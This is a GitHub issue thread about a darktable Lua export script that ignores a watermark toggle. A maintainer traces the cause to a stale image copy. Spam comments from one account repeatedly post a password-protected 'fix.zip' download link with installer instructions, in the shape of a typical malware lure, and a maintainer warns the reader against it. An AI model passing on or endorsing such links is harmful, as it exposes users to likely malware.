### ISSUE TITLE
Lua not applying action before export

### ISSUE THREAD

**Issue by Electro707** [darktable-org/darktable#17373]
### Describe the bug

Hello,

When I run a Lua script that disables/enables a module, like Watermark, then export the image, the watermark change does not get applied to the image at all.

I can visually see the module toggling in my preview, but that does not get exported correctly. I even tried waiting 1 seconds between toggling the module and exporting, to no avail.

### Steps to reproduce

Run the following shortcut/script on an image in darkroom

```lua
local dt = require "darktable"

local jpegExporter = dt.new_format("jpeg")

local function export_multiple(event, shortcut)
    for i_, i in ipairs(dt.gui.action_images) do
        -- Export full JPEG image first
        jpegExporter.max_width = 0
        jpegExporter.max_height = 0
        jpegExporter.quality = 100

        filename = i.filename:match("^(.+)%..+$")
        -- No watermark export

        dt.gui.action("iop/watermark", 0, "enable", "", 1)

        exportName = string.format("%s/darktable_exported/%s-NW.jpg", i.path, filename)
        dt.print(string.format("Exporting No Watermark to %s", exportName))
        jpegExporter:write_image(i, exportName, false)

        -- watermark full-res export
        dt.gui.action("iop/watermark", 0, "enable", "", 1)

        exportName = string.format("%s/darktable_exported/%s.jpg", i.path, filename)
        dt.print(string.format("Exporting high-res to %s", exportName))
        jpegExporter:write_image(i, exportName, false)
    end

    dt.print("Done!")

end
```

### Where did you obtain darktable from?

distro packaging

### darktable version

4.8.1

### What OS are you using?

Linux

### What is the version of your OS?

Arch Linux

### Are you using OpenCL GPU in darktable?

Yes

### If yes, what is the GPU card and driver?

RX 580

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by wpferguson** [comment]
@Electro707 I don't think the above link has anything to do with your problem and I'd be very cautious about clicking on it especially with no accompanying explanation.

**Comment by wpferguson** [comment]
Your script doesn't work because you created a callback for a shortcut (export_multiple) but you didn't register the shortcut and assign a keystroke combination to it.

You need to add 

```
dt.register_event(MODULE, "shortcut",
  function(event, shortcut)
    -- do something
  end, "tooltip for shortcut"
```
Change `-- do something ` to `export_multiple` and the other fields as necessary.  

Start darktable, start your script, then go to settings->shortcuts->Lua scripts.  Find your shortcut and assign a key combination to it then open an image in darkroom and try it.

**Comment by Mlecherf** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wpferguson** [comment]
@Mlecherf what are trying to do?

**Comment by wpferguson** [comment]
@Electro707 your other choice is to control darktable's exporter from a script using dt.gui.action()

**Comment by Mlecherf** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Electro707** [comment]
@wpferguson

> @Electro707 I don't think the above link has anything to do with your problem and I'd be very cautious about clicking on it especially with no accompanying explanation.

What link? I didn't include any on my post



> Your script doesn't work because you created a callback for a shortcut (export_multiple) but you didn't register the shortcut and assign a keystroke combination to it.
> 
> You need to add
> 
> ```
> dt.register_event(MODULE, "shortcut",
>   function(event, shortcut)
>     -- do something
>   end, "tooltip for shortcut"
> ```
> 
> Change `-- do something ` to `export_multiple` and the other fields as necessary.
> 
> Start darktable, start your script, then go to settings->shortcuts->Lua scripts. Find your shortcut and assign a key combination to it then open an image in darkroom and try it.
> 
> And add a closing `)` after the shortcut

I already had that in my luarc file, but didn't copy it to this issue. oops, here what it is

```lua
dt.register_event("Export JPEG (F and C)",
       "shortcut", export_multiple,
       "A shortcut to export JPEG full and cropped")
```



> @Electro707 your other choice is to control darktable's exporter from a script using dt.gui.action()

That is what I initially tried, but I ditched that method mainly because I would not find a way to modify the file name nor other parameters in Lua

**Comment by wpferguson** [comment]
Here's what's happening with the script.

- You start the loop and get a COPY of the image
- You export the image
- You change the image
- You export the original COPY of the image 

You need to reload the image after you change it to get the changes.  If you are doing the change in darkroom mode, you can get the updated copy using `dt.gui.views.darkroom.display_image()`.  Calling with no arguments gives you the current darkroom image.

**Comment by Electro707** [comment]
Thank you so much, that was indeed the root cause.

Should we maybe make the fact the function will only get a copy of the image part of the Lua documentation? Initially reading into it I expected it act more like a pointer to the image?

**Comment by wpferguson** [comment]
Up until dt.gui.action() it wasn't an issue since there wasn't a way to alter the history stack of a selected image without using the selected image operations to do it.  I'll think about how to add it to the Lua docs.

**Comment by Electro707** [comment]
Thanks, for now I'll close this issue as it's been resolved.
